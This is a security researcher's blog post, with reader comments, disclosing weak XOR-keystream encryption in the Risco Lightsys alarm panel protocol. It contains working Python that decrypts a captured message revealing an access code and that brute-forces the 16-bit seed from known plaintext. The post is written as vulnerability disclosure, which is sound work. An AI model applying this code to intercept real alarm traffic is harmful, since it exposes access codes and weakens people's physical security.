During a routine pen-test of an alarm receiving centre, a piece of software was found that was used to remotely configure Risco alarms.
This software communicates with alarm panels, sometimes over IP, sometimes over a mobile network. One of these panels is the Lightsys panel, which seems fairly common in the UK.
The encryption used by this protocol is token at best, and not suitable for securing communication across an untrusted network.
The protocol generates a pseudo-random sequence of bytes using a simple shift-and-XOR function. This sequence is then XORed with the message to encrypt or decrypt it.
Each panel has a “seed” that changes the keystream slightly. Because part of the plaintext is known, you don’t need to know the seed in advance to decrypt messages – it can simply be recovered. The seed tended to be the same across many panels.
```python
numTable = [2, 4, 16, 32768]   # tap mask: register bits 1, 2, 4 and 15
PRNG_output = []

# This is the "Remote ID code" in the software
seed = 2

# Generate 255 keystream bytes: XOR the tapped bits together, shift the
# register left with the result as the new low bit, then emit the low byte.
for i in range(0, 255):
    bit = 0
    for j in range(0, 4):
        if (seed & numTable[j]) > 0:
            bit ^= 1
    seed = seed << 1 | bit
    PRNG_output.append(seed & 255)

# This has been captured from the network by tricking the software into encrypting
# Message is 02RMT=1234 8EBC
# 02 is sequence number
# RMT is a command
# 1234 is the access code
msg = bytes.fromhex('353945620a804bc6dbe4b67ac0495503')

# Decryption is the same XOR with the keystream
plain = ''
for i in range(0, len(msg)):
    plain += chr(msg[i] ^ PRNG_output[i])

print("Decrypted message: %s" % plain)
```
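To make concrete why the “Remote ID code” adds no meaningful protection, here is an added example (not code from the original post or from Risco’s software) that re-implements the keystream generator above and recovers the seed from the captured message by trying every possible value. The function names, the 16-bit masking of the register (bits at or above 16 never reach a tap, so the output is unchanged) and the choice of `02RMT=1234` as the known prefix are this example’s own. The post shows the byte between the access code and the checksum field as a space; it decrypts to the control character 0x17, and the last captured byte is not part of the text the post lists, so only the first 15 bytes are decrypted here.

```python
# Added example: shows that the post's shift-and-XOR keystream is driven by a
# 16-bit seed, so a few bytes of known plaintext let the seed be found by
# exhaustive search in well under a second.
from typing import Iterator, List

TAPS = (2, 4, 16, 32768)   # register bits 1, 2, 4 and 15, as in the post
SEED_SPACE = 1 << 16       # bits at or above 16 never reach a tap


def keystream(seed: int) -> Iterator[int]:
    """Yield keystream bytes for a seed, using the post's generator."""
    while True:
        bit = 0
        for mask in TAPS:
            if seed & mask:
                bit ^= 1
        # Keep the register to 16 bits; higher bits never influence the output.
        seed = (seed << 1 | bit) & 0xFFFF
        yield seed & 0xFF


def xor_bytes(seed: int, data: bytes) -> bytes:
    """Encrypt or decrypt (the same operation): XOR data with the keystream."""
    return bytes(b ^ k for b, k in zip(data, keystream(seed)))


def recover_seeds(ciphertext: bytes, known_prefix: bytes) -> List[int]:
    """Return every 16-bit seed whose keystream maps known_prefix onto the
    start of ciphertext. Two known bytes leave 128 candidates; nine or more
    known bytes pin the seed down to a single value."""
    wanted = [c ^ p for c, p in zip(ciphertext, known_prefix)]
    found = []
    for seed in range(SEED_SPACE):
        ks = keystream(seed)
        if all(next(ks) == w for w in wanted):
            found.append(seed)
    return found


# Constructed sample: the ciphertext from the post and the message it lists.
CAPTURED = bytes.fromhex("353945620a804bc6dbe4b67ac0495503")
KNOWN = b"02RMT=1234"   # sequence number, command, access code


def demo() -> dict:
    """Recover the seed from the known prefix, then decrypt the message."""
    seeds = recover_seeds(CAPTURED, KNOWN)
    plain = xor_bytes(seeds[0], CAPTURED[:15]) if seeds else b""
    return {"seeds": seeds, "plaintext": plain}


if __name__ == "__main__":
    result = demo()
    print("candidate seeds:", result["seeds"])
    print("recovered plaintext:", result["plaintext"])
```

The search space is 65,536 seeds because every bit of the seed above bit 15 shifts out of reach of the taps without ever being used, which is the concrete meaning of the conclusion that a key must be long enough to actually improve security.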
A further proof of concept was developed that can send and receive commands with alarms, leading to a denial-of-service condition. I am not disclosing this as it can cause harm and is not the root cause of the problem.
This was reported to Risco on 7th August. As yet, they have not indicated whether they wish to fix this issue.
Conclusion
- Don’t roll your own encryption
- If you have a key, make sure it has enough length to actually improve security
Luca
June 8, 2018 at 4:55pm
Hi! Interesting article… I’m trying to access my Risco panel with a serial connection and decrypt data… Can you tell me if your method is still applicable? I tried but none…
cybergibbons
June 13, 2018 at 8:46am
Sorry – really not sure! I didn’t really look at the serial side.
Luca
June 13, 2018 at 8:49am
Oh, serial or IP connection, the same… does this article still work on the IP connection?
Marco
July 13, 2018 at 1:36pm
Hi,
I’m interested in hooking up a Linux monitor on my RISCO bus.
Did you make any progress with the decryption part?
I still have to figure out the serial part though…
Tozman
September 16, 2018 at 8:18pm
There is a “debug” mode in their software; you can see the data being sent.
Hd
August 31, 2019 at 12:32pm
Trying to do the same for better integration with my system. So far I have just had some time to hook up serial and a sniffer on the CS communication. Haven’t really looked at the data yet.
John Tunnicliffe
January 16, 2021 at 4:37pm
Luca, did you get anywhere with this? I am using your extension to Home Assistant that uses the Risco Cloud. However, that becomes a paid subscription soon, so I started to investigate alternatives.